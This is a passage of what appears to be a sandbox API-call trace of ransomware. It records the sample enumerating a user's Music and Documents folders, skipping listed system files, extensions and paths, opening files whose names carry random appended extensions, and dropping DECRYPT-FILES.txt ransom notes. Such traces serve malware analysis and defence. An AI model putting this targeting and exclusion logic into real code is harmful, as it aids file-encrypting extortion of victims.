(lpString="UJdL.mp3.sIe3v") returned 14 [0185.938] lstrcmpiW (lpString1="sIe3v", lpString2="lnk") returned 1 [0185.938] lstrcmpiW (lpString1="sIe3v", lpString2="exe") returned 1 [0185.938] lstrcmpiW (lpString1="sIe3v", lpString2="sys") returned -1 [0185.938] lstrcmpiW (lpString1="sIe3v", lpString2="dll") returned 1 [0185.938] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\") returned 61 [0185.938] lstrlenW (lpString="UJdL.mp3.sIe3v") returned 14 [0185.938] lstrcpyW (in: lpString1=0x36fe7e0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\" [0185.938] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\", lpString2="UJdL.mp3.sIe3v" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\UJdL.mp3.sIe3v") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\UJdL.mp3.sIe3v" [0185.938] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.938] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\UJdL.mp3.sIe3v" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\cogt\\ujdl.mp3.sie3v"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x26c [0185.939] GetFileSizeEx (in: hFile=0x26c, lpFileSize=0x36fdfa8 | out: lpFileSize=0x36fdfa8*=28147) returned 1 [0185.939] CreateFileMappingW (hFile=0x26c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x270 [0185.939] MapViewOfFile (hFileMappingObject=0x270, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.939] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.940] CloseHandle (hObject=0x270) returned 1 [0185.940] CloseHandle (hObject=0x26c) returned 1 [0185.940] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.940] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabc4ebb0, ftCreationTime.dwHighDateTime=0x1d4cf11, ftLastAccessTime.dwLowDateTime=0xaa07fbc0, ftLastAccessTime.dwHighDateTime=0x1d4d27a, ftLastWriteTime.dwLowDateTime=0xaf605a60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x6df3, dwReserved0=0x0, dwReserved1=0x0, cFileName="UJdL.mp3.sIe3v", cAlternateFileName="UJDLMP~1.SIE")) returned 0 [0185.940] FindClose (in: hFindFile=0x4798f8 | out: hFindFile=0x4798f8) returned 1 [0185.940] CloseHandle (hObject=0x264) returned 1 [0185.940] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf43c9e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaf43c9e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf43c9e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0185.940] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0185.940] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9ee0d80, ftCreationTime.dwHighDateTime=0x1d4cb82, ftLastAccessTime.dwLowDateTime=0xf3552d40, ftLastAccessTime.dwHighDateTime=0x1d4cb43, ftLastWriteTime.dwLowDateTime=0xaf651d20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x11b0c, dwReserved0=0x0, dwReserved1=0x0, cFileName="jars3vHzEL-kaB8.mp3.L1cqs8x", cAlternateFileName="JARS3V~1.L1C")) returned 1 [0185.940] lstrcmpiW (lpString1="jars3vHzEL-kaB8.mp3.L1cqs8x", lpString2="DECRYPT-FILES.txt") returned 1 [0185.940] lstrcmpiW (lpString1="jars3vHzEL-kaB8.mp3.L1cqs8x", lpString2="autorun.inf") returned 1 [0185.940] lstrcmpiW (lpString1="jars3vHzEL-kaB8.mp3.L1cqs8x", lpString2="boot.ini") returned 1 [0185.940] lstrcmpiW (lpString1="jars3vHzEL-kaB8.mp3.L1cqs8x", lpString2="desktop.ini") returned 1 [0185.940] lstrcmpiW (lpString1="jars3vHzEL-kaB8.mp3.L1cqs8x", lpString2="ntuser.dat") returned -1 [0185.940] lstrcmpiW (lpString1="jars3vHzEL-kaB8.mp3.L1cqs8x", lpString2="iconcache.db") returned 1 [0185.940] lstrcmpiW (lpString1="jars3vHzEL-kaB8.mp3.L1cqs8x", lpString2="bootsect.bak") returned 1 [0185.940] lstrcmpiW (lpString1="jars3vHzEL-kaB8.mp3.L1cqs8x", lpString2="ntuser.dat.log") returned -1 [0185.940] lstrcmpiW (lpString1="jars3vHzEL-kaB8.mp3.L1cqs8x", lpString2="thumbs.db") returned -1 [0185.940] lstrcmpiW (lpString1="jars3vHzEL-kaB8.mp3.L1cqs8x", lpString2="Bootfont.bin") returned 1 [0185.941] lstrlenW (lpString="jars3vHzEL-kaB8.mp3.L1cqs8x") returned 27 [0185.941] lstrcmpiW (lpString1="L1cqs8x", lpString2="lnk") returned -1 [0185.941] lstrcmpiW (lpString1="L1cqs8x", lpString2="exe") returned 1 [0185.941] lstrcmpiW (lpString1="L1cqs8x", lpString2="sys") returned -1 [0185.941] lstrcmpiW (lpString1="L1cqs8x", lpString2="dll") returned 1 [0185.941] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\") returned 56 [0185.941] lstrlenW (lpString="jars3vHzEL-kaB8.mp3.L1cqs8x") returned 27 [0185.941] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\" [0185.941] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\", lpString2="jars3vHzEL-kaB8.mp3.L1cqs8x" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\jars3vHzEL-kaB8.mp3.L1cqs8x") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\jars3vHzEL-kaB8.mp3.L1cqs8x" [0185.941] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.941] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\jars3vHzEL-kaB8.mp3.L1cqs8x" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\jars3vhzel-kab8.mp3.l1cqs8x"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0185.941] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=72460) returned 1 [0185.941] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0185.941] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.942] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.942] CloseHandle (hObject=0x268) returned 1 [0185.942] CloseHandle (hObject=0x264) returned 1 [0185.942] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.942] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d3e12f0, ftCreationTime.dwHighDateTime=0x1d4caab, ftLastAccessTime.dwLowDateTime=0x5c87b830, ftLastAccessTime.dwHighDateTime=0x1d4c687, ftLastWriteTime.dwLowDateTime=0xaf677e80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x14ed4, dwReserved0=0x0, dwReserved1=0x0, cFileName="tETpDL N.mp3.Xpio", cAlternateFileName="TETPDL~1.XPI")) returned 1 [0185.942] lstrcmpiW (lpString1="tETpDL N.mp3.Xpio", lpString2="DECRYPT-FILES.txt") returned 1 [0185.943] lstrcmpiW (lpString1="tETpDL N.mp3.Xpio", lpString2="autorun.inf") returned 1 [0185.943] lstrcmpiW (lpString1="tETpDL N.mp3.Xpio", lpString2="boot.ini") returned 1 [0185.943] lstrcmpiW (lpString1="tETpDL N.mp3.Xpio", lpString2="desktop.ini") returned 1 [0185.943] lstrcmpiW (lpString1="tETpDL N.mp3.Xpio", lpString2="ntuser.dat") returned 1 [0185.943] lstrcmpiW (lpString1="tETpDL N.mp3.Xpio", lpString2="iconcache.db") returned 1 [0185.943] lstrcmpiW (lpString1="tETpDL N.mp3.Xpio", lpString2="bootsect.bak") returned 1 [0185.943] lstrcmpiW (lpString1="tETpDL N.mp3.Xpio", lpString2="ntuser.dat.log") returned 1 [0185.943] lstrcmpiW (lpString1="tETpDL N.mp3.Xpio", lpString2="thumbs.db") returned -1 [0185.943] lstrcmpiW (lpString1="tETpDL N.mp3.Xpio", lpString2="Bootfont.bin") returned 1 [0185.943] lstrlenW (lpString="tETpDL N.mp3.Xpio") returned 17 [0185.943] lstrcmpiW (lpString1="Xpio", lpString2="lnk") returned 1 [0185.943] lstrcmpiW (lpString1="Xpio", lpString2="exe") returned 1 [0185.943] lstrcmpiW (lpString1="Xpio", lpString2="sys") returned 1 [0185.943] lstrcmpiW (lpString1="Xpio", lpString2="dll") returned 1 [0185.943] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\") returned 56 [0185.943] lstrlenW (lpString="tETpDL N.mp3.Xpio") returned 17 [0185.943] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\" [0185.943] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\", lpString2="tETpDL N.mp3.Xpio" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\tETpDL N.mp3.Xpio") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\tETpDL N.mp3.Xpio" [0185.943] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.943] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\tETpDL N.mp3.Xpio" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\tetpdl n.mp3.xpio"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0185.943] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=85716) returned 1 [0185.944] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0185.944] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.944] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.944] CloseHandle (hObject=0x268) returned 1 [0185.944] CloseHandle (hObject=0x264) returned 1 [0185.945] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.945] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4838c3d0, ftCreationTime.dwHighDateTime=0x1d4d36e, ftLastAccessTime.dwLowDateTime=0xbe691d10, ftLastAccessTime.dwHighDateTime=0x1d4d540, ftLastWriteTime.dwLowDateTime=0xaf710400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x39dd, dwReserved0=0x0, dwReserved1=0x0, cFileName="zU XAhD6n QtktGAoqJg.mp3.q6SYu", cAlternateFileName="ZUXAHD~1.Q6S")) returned 1 [0185.945] lstrcmpiW (lpString1="zU XAhD6n QtktGAoqJg.mp3.q6SYu", lpString2="DECRYPT-FILES.txt") returned 1 [0185.945] lstrcmpiW (lpString1="zU XAhD6n QtktGAoqJg.mp3.q6SYu", lpString2="autorun.inf") returned 1 [0185.945] lstrcmpiW (lpString1="zU XAhD6n QtktGAoqJg.mp3.q6SYu", lpString2="boot.ini") returned 1 [0185.945] lstrcmpiW (lpString1="zU XAhD6n QtktGAoqJg.mp3.q6SYu", lpString2="desktop.ini") returned 1 [0185.945] lstrcmpiW (lpString1="zU XAhD6n QtktGAoqJg.mp3.q6SYu", lpString2="ntuser.dat") returned 1 [0185.945] lstrcmpiW (lpString1="zU XAhD6n QtktGAoqJg.mp3.q6SYu", lpString2="iconcache.db") returned 1 [0185.945] lstrcmpiW (lpString1="zU XAhD6n QtktGAoqJg.mp3.q6SYu", lpString2="bootsect.bak") returned 1 [0185.945] lstrcmpiW (lpString1="zU XAhD6n QtktGAoqJg.mp3.q6SYu", lpString2="ntuser.dat.log") returned 1 [0185.945] lstrcmpiW (lpString1="zU XAhD6n QtktGAoqJg.mp3.q6SYu", lpString2="thumbs.db") returned 1 [0185.945] lstrcmpiW (lpString1="zU XAhD6n QtktGAoqJg.mp3.q6SYu", lpString2="Bootfont.bin") returned 1 [0185.945] lstrlenW (lpString="zU XAhD6n QtktGAoqJg.mp3.q6SYu") returned 30 [0185.945] lstrcmpiW (lpString1="q6SYu", lpString2="lnk") returned 1 [0185.945] lstrcmpiW (lpString1="q6SYu", lpString2="exe") returned 1 [0185.945] lstrcmpiW (lpString1="q6SYu", lpString2="sys") returned -1 [0185.945] lstrcmpiW (lpString1="q6SYu", lpString2="dll") returned 1 [0185.945] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\") returned 56 [0185.945] lstrlenW (lpString="zU XAhD6n QtktGAoqJg.mp3.q6SYu") returned 30 [0185.945] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\" [0185.945] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\", lpString2="zU XAhD6n QtktGAoqJg.mp3.q6SYu" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\zU XAhD6n QtktGAoqJg.mp3.q6SYu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\zU XAhD6n QtktGAoqJg.mp3.q6SYu" [0185.945] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.946] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\zU XAhD6n QtktGAoqJg.mp3.q6SYu" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\zu xahd6n qtktgaoqjg.mp3.q6syu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0185.946] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=14813) returned 1 [0185.946] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0185.946] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.947] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.947] CloseHandle (hObject=0x268) returned 1 [0185.947] CloseHandle (hObject=0x264) returned 1 [0185.947] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.947] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4838c3d0, ftCreationTime.dwHighDateTime=0x1d4d36e, ftLastAccessTime.dwLowDateTime=0xbe691d10, ftLastAccessTime.dwHighDateTime=0x1d4d540, ftLastWriteTime.dwLowDateTime=0xaf710400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x39dd, dwReserved0=0x0, dwReserved1=0x0, cFileName="zU XAhD6n QtktGAoqJg.mp3.q6SYu", cAlternateFileName="ZUXAHD~1.Q6S")) returned 0 [0185.947] FindClose (in: hFindFile=0x4798b8 | out: hFindFile=0x4798b8) returned 1 [0185.947] CloseHandle (hObject=0x25c) returned 1 [0185.948] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7536a150, ftCreationTime.dwHighDateTime=0x1d4d278, ftLastAccessTime.dwLowDateTime=0xaf736560, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf736560, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zUt2ThE-zNirRyoAwYp\\", cAlternateFileName="ZUT2TH~1")) returned 0 [0185.948] FindClose (in: hFindFile=0x479878 | out: hFindFile=0x479878) returned 1 [0185.948] CloseHandle (hObject=0x254) returned 1 [0185.948] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0185.948] lstrcmpW (lpString1="My Documents", lpString2=".") returned 1 [0185.948] lstrcmpW (lpString1="My Documents", lpString2="..") returned 1 [0185.948] lstrcatW (in: lpString1="My Documents", lpString2="\\" | out: lpString1="My Documents\\") returned="My Documents\\" [0185.948] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="My Documents\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\" [0185.948] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\", lpSrch="\\Program Files") returned 0x0 [0185.948] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\", lpSrch=":\\Windows") returned 0x0 [0185.948] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\", lpSrch="\\Games\\") returned 0x0 [0185.948] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\", lpSrch="\\Tor Browser\\") returned 0x0 [0185.948] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\", lpSrch="\\ProgramData\\") returned 0x0 [0185.948] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0185.948] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0185.948] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0185.948] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\", lpSrch="\\All Users") returned 0x0 [0185.948] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\", lpSrch="\\IETldCache\\") returned 0x0 [0185.948] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\", lpSrch="\\Local Settings\\") returned 0x0 [0185.948] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\", lpSrch="\\AppData\\Local") returned 0x0 [0185.948] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\", lpSrch="AhnLab") returned 0x0 [0185.948] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0185.949] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\") returned 43 [0185.949] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.949] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\\\0a16c9.tmp") returned 54 [0185.949] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x254 [0185.949] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\") returned 43 [0185.949] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0185.949] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\\\DECRYPT-FILES.txt") returned 61 [0185.949] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.949] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\") returned 43 [0185.949] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*" [0185.949] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7536a150, ftCreationTime.dwHighDateTime=0x1d4d278, ftLastAccessTime.dwLowDateTime=0xaf736560, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf736560, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zUt2ThE-zNirRyoAwYp\\", cAlternateFileName="苟眔酯ͯ")) returned 0xffffffff [0185.949] CloseHandle (hObject=0x254) returned 1 [0185.950] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0185.950] lstrcmpW (lpString1="NetHood", lpString2=".") returned 1 [0185.950] lstrcmpW (lpString1="NetHood", lpString2="..") returned 1 [0185.950] lstrcatW (in: lpString1="NetHood", lpString2="\\" | out: lpString1="NetHood\\") returned="NetHood\\" [0185.950] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="NetHood\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\" [0185.950] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\", lpSrch="\\Program Files") returned 0x0 [0185.950] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\", lpSrch=":\\Windows") returned 0x0 [0185.950] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\", lpSrch="\\Games\\") returned 0x0 [0185.950] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\", lpSrch="\\Tor Browser\\") returned 0x0 [0185.950] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\", lpSrch="\\ProgramData\\") returned 0x0 [0185.950] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0185.950] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0185.950] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0185.950] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\", lpSrch="\\All Users") returned 0x0 [0185.950] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\", lpSrch="\\IETldCache\\") returned 0x0 [0185.950] StrStrW 